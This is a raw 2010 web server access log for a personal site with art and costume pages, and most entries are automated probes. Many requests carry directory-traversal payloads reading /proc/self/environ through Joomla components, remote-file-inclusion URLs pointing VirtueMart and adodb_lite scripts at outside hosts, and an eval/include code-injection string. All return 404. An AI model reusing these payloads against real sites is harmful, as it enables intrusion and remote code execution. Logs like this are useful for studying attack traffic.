24.162.136.251 - - [27/Jun/2010:09:46:15 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
24.162.136.251 - - [27/Jun/2010:09:46:15 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
24.162.136.251 - - [27/Jun/2010:09:46:41 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
94.247.176.194 - - [27/Jun/2010:09:46:46 -0500] "GET /logs/access_log.1276473600//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:46 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:46 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:51 -0500] "GET /logs/access_log.1276473600//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:51 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:51 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:51 -0500] "GET /logs/access_log.1276819200//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:46:54 -0500] "GET /logs/access_log.1276819200//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
66.235.124.15 - - [27/Jun/2010:09:47:03 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
66.235.124.15 - - [27/Jun/2010:09:47:03 -0500] "GET /artwork/txt.htm HTTP/1.1" 200 3880 "-""Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)"
24.162.136.251 - - [27/Jun/2010:09:47:34 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
24.162.136.251 - - [27/Jun/2010:09:47:38 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.825"
24.162.136.251 - - [27/Jun/2010:09:47:38 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.825"
110.11.20.41 - - [27/Jun/2010:09:48:47 -0500] "GET /logs/access_log.1274832000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.79"
78.41.233.128 - - [27/Jun/2010:09:49:08 -0500] "GET /logs/access_log.1276473600//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:49:08 -0500] "GET //index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:49:08 -0500] "GET /logs//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:49:10 -0500] "GET /logs/access_log.1276819200//index.php?option=com_rpx&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.21.189 - - [27/Jun/2010:09:49:22 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.41.233.128 - - [27/Jun/2010:09:49:22 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
91.121.21.189 - - [27/Jun/2010:09:49:22 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
78.41.233.128 - - [27/Jun/2010:09:49:22 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.121.21.189 - - [27/Jun/2010:09:49:22 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
78.41.233.128 - - [27/Jun/2010:09:49:23 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
91.121.21.189 - - [27/Jun/2010:09:49:27 -0500] "GET /logs/access_log.1276646400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
78.41.233.128 - - [27/Jun/2010:09:49:27 -0500] "GET /logs/access_log.1276646400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
24.162.136.251 - - [27/Jun/2010:09:50:20 -0500] "GET /logs/access_log.1275609600//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.825"
94.247.176.194 - - [27/Jun/2010:09:52:47 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:52:49 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
94.247.176.194 - - [27/Jun/2010:09:52:51 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
67.15.198.39 - - [27/Jun/2010:09:52:51 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
67.15.198.39 - - [27/Jun/2010:09:52:51 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
67.15.198.39 - - [27/Jun/2010:09:52:51 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
67.15.198.39 - - [27/Jun/2010:09:52:54 -0500] "GET /logs/access_log.1276646400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
94.247.176.194 - - [27/Jun/2010:09:53:01 -0500] "GET /logs/access_log.1276646400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
77.79.246.80 - - [27/Jun/2010:09:55:40 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.808"
77.79.246.80 - - [27/Jun/2010:09:55:40 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
77.79.246.80 - - [27/Jun/2010:09:55:40 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
78.41.233.128 - - [27/Jun/2010:09:56:34 -0500] "GET /logs/access_log.1276473600//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:56:34 -0500] "GET //index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
78.41.233.128 - - [27/Jun/2010:09:56:34 -0500] "GET /logs//index.php?option=com_properties&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
178.63.9.134 - - [27/Jun/2010:09:56:53 -0500] "GET /logs/access_log.1276214400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
178.63.9.134 - - [27/Jun/2010:09:56:53 -0500] "GET //index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
178.63.9.134 - - [27/Jun/2010:09:56:53 -0500] "GET /logs//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
178.63.9.134 - - [27/Jun/2010:09:56:57 -0500] "GET /logs/access_log.1276646400//index.php?option=com_datafeeds&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
213.165.85.241 - - [27/Jun/2010:09:59:21 -0500] "GET /logs/access_log.1275264000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:59:21 -0500] "GET //index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.165.85.241 - - [27/Jun/2010:09:59:22 -0500] "GET /logs//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
77.79.246.80 - - [27/Jun/2010:09:59:49 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
213.165.85.241 - - [27/Jun/2010:10:00:26 -0500] "GET /logs/access_log.1274400000//index.php?option=com_econtent&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
67.195.112.180 - - [27/Jun/2010:10:02:48 -0500] "GET /logs/access_log.1274832000 HTTP/1.0" 200 738114 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.182.63.49 - - [27/Jun/2010:10:03:43 -0500] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
67.30.129.57 - - [27/Jun/2010:10:06:38 -0500] "GET /logs/access_log.1266710400%20%20///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classzZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:10:06:39 -0500] "GET ///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classzZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.30.129.57 - - [27/Jun/2010:10:06:39 -0500] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);classzZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
122.201.73.37 - - [27/Jun/2010:10:08:08 -0500] "GET /logs/access_log.1276732800///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
122.201.73.37 - - [27/Jun/2010:10:08:08 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
122.201.73.37 - - [27/Jun/2010:10:08:08 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.833"
211.234.100.196 - - [27/Jun/2010:10:08:55 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:08:55 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:08:56 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:08:57 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:09:05 -0500] "GET /logs/access_log.1276041600//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
207.46.199.39 - - [27/Jun/2010:10:09:10 -0500] "GET /logs/access_log.1258243200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
211.234.100.196 - - [27/Jun/2010:10:09:11 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:09:12 -0500] "GET /logs//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:09:14 -0500] "GET /logs/access_log.1276732800//index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:10:00 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
211.234.100.196 - - [27/Jun/2010:10:10:53 -0500] "GET //index.php?option=com_joomlaflashfun&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
91.212.226.112 - - [27/Jun/2010:10:11:43 -0500] "GET /logs/access_log.1215302400 HTTP/1.0" 404 298 "http://tomdolan.pconline.com/logs/access_log.1215302400""Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)"
67.195.112.180 - - [27/Jun/2010:10:13:38 -0500] "GET /logs/access_log.1274659200 HTTP/1.0" 200 983818 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
188.40.106.183 - - [27/Jun/2010:10:14:11 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
110.11.20.41 - - [27/Jun/2010:10:21:33 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
188.40.106.183 - - [27/Jun/2010:10:22:22 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:10:22:22 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:10:22:22 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.833"
207.46.204.193 - - [27/Jun/2010:10:22:40 -0500] "GET /logs/access_log.1250726400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [27/Jun/2010:10:25:22 -0500] "GET /logs/access_log.1167523200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
62.182.63.49 - - [27/Jun/2010:10:26:13 -0500] "GET /logs/access_log.1276473600/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:10:26:13 -0500] "GET /index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.182.63.49 - - [27/Jun/2010:10:26:14 -0500] "GET /logs/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
188.40.106.183 - - [27/Jun/2010:10:26:57 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
62.182.63.49 - - [27/Jun/2010:10:28:10 -0500] "GET /logs/access_log.1276041600/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:10:29:38 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
24.165.85.35 - - [27/Jun/2010:10:30:11 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://www.google.com/search?client=safari&rls=en&q=albert+Kretschmer+lithos&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:11 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1799 "http://www.google.com/search?client=safari&rls=en&q=albert+Kretschmer+lithos&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:11 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:15 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21829 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3851 "http://tomdolan.pconline.com/costume/index1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/040_JPG%20copy.jpg HTTP/1.1" 200 49303 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/039_JPG%20copy.jpg HTTP/1.1" 200 46480 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/042_JPG%20copy.jpg HTTP/1.1" 200 43788 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/037_JPG%20copy.jpg HTTP/1.1" 200 46400 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/041_JPG%20copy.jpg HTTP/1.1" 200 47808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/038_JPG%20copy.jpg HTTP/1.1" 200 46731 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/043_JPG%20copy.jpg HTTP/1.1" 200 45534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/044_JPG%20copy.jpg HTTP/1.1" 200 46286 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:50 -0500] "GET /costume/046_JPG%20copy.jpg HTTP/1.1" 200 46590 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:51 -0500] "GET /costume/047_JPG%20copy.jpg HTTP/1.1" 200 46201 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
24.165.85.35 - - [27/Jun/2010:10:30:51 -0500] "GET /costume/048_JPG%20copy.jpg HTTP/1.1" 200 50534 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-us) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16"
110.11.20.41 - - [27/Jun/2010:10:34:28 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
77.79.246.80 - - [27/Jun/2010:10:34:51 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
188.40.106.183 - - [27/Jun/2010:10:40:04 -0500] "GET /logs/access_log.1274832000///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:10:41:16 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:10:41:16 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.833"
188.40.106.183 - - [27/Jun/2010:10:41:16 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.833"
77.221.130.28 - - [27/Jun/2010:10:44:45 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:10:44:46 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:10:44:46 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
77.79.246.80 - - [27/Jun/2010:10:47:24 -0500] "GET /logs/access_log.1276819200///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.808"
77.79.246.80 - - [27/Jun/2010:10:47:24 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.808"
77.79.246.80 - - [27/Jun/2010:10:47:24 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.808"
77.221.130.28 - - [27/Jun/2010:10:52:02 -0500] "GET /logs/access_log.1266710400///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:10:52:03 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
77.221.130.28 - - [27/Jun/2010:10:52:03 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tramoregolfclub.com//language/_vti_pvt/..bash/id1.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.805"
